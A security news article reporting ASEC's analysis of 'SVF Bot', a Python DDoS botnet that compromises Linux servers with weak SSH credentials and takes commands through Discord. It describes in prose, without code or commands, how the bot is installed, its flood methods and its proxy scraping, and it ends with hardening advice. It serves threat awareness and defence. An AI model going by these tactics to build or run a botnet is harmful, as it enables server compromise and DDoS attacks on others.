Cybercriminals Exploiting Linux SSH Servers to Launch SVF Botnet

A new wave of DDoS botnet malware known as “SVF Bot” is being used by threat actors in a recent wave of attacks against Linux SSH servers that are not sufficiently secured.

Security intelligence experts at AhnLab Security Intelligence Center (ASEC), monitoring a global network of SSH honeypots, have observed significant activity involving the SVF Botnet.

This sophisticated malware, developed in Python and managed remotely through Discord, illustrates the evolving tactics cybercriminals are now employing against Internet-facing infrastructure using weak or default credentials.

Discord as Command Hub

The infection begins when attackers gain unauthorized SSH access by brute-forcing credentials on vulnerable Linux servers.

The entire infection chain can be executed with a single shell command line: the attacker creates a Python virtual environment, installs the necessary Python libraries (including Discord.py for C&C operations, alongside requests, aiohttp, lxml), downloads the SVF Bot’s malicious payload, and immediately executes it.

The bot authenticates itself to a Discord server using a hardwired token, effectively turning Discord into its command-and-control (C&C) backend.

Using this platform, threat actors can issue instructions to the bot, manage infected hosts, and organize attacks with group segmentation parameters such as server IDs supplied at runtime.

On activation, the SVF Bot notifies operators via a Discord webhook, sending basic information like the server identifier.

It supports multiple DDoS attack vectors, with the primary methods being L7 HTTP Floods and L4 UDP Floods.

Among the notable features is its advanced proxy management for HTTP-based attacks: SVF Bot automatically scrapes proxy IP addresses from multiple reputable online sources, validates them via real-time Google connections, and employs them to route attack traffic.

This approach not only obscures the attackers’ true origin but also dramatically increases the botnet’s disruptive power during coordinated DDoS campaigns.

Streamlined DDoS Operations

The SVF Bot boasts a range of remote commands sent via Discord, allowing operators to manage DDoS methods, load and reset proxy lists, initiate floods with fully customizable parameters, and forcibly update, crash, or stop bots as needed.

The streamlined and modular command structure allows even low-skilled actors to run large-scale attacks with minimal effort.

This ease of deployment, coupled with the malware’s ability to self-update and reinstall via alternative URLs or new Python payloads, poses an enduring challenge for defenders.

ASEC’s analysis indicates that the SVF Botnet is primarily leveraged for disruptive campaigns but could easily evolve to incorporate additional payloads or functions, given its Python base and C&C flexibility.

The malware operators’ use of evolving distribution URLs, as well as Discord’s wide adoption and low barrier for C&C management, further complicates detection and take-down efforts.

The persistence of attacks exploiting SSH with weak credentials reiterates the critical need for robust server hardening.

According to the Report, Security experts strongly advise system administrators to enforce strong, unique passwords, update all software to latest secure versions, and restrict SSH access to trusted sources preferably by firewall policy and not exposing services unnecessarily to the public Internet.

The employment of up-to-date endpoint defense solutions and continuous monitoring for suspicious activity remain foundational best practices against both brute-force and remote exploitation attempts.

As SVF Bot continues to evolve and propagate, the case serves as a stark reminder that DDoS botnets are not limited to Windows platforms or legacy binaries.

The modern-era botnet leverages cross-platform scripting, dynamic proxy infrastructures, and popular communication platforms to build resilient malware ecosystems.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.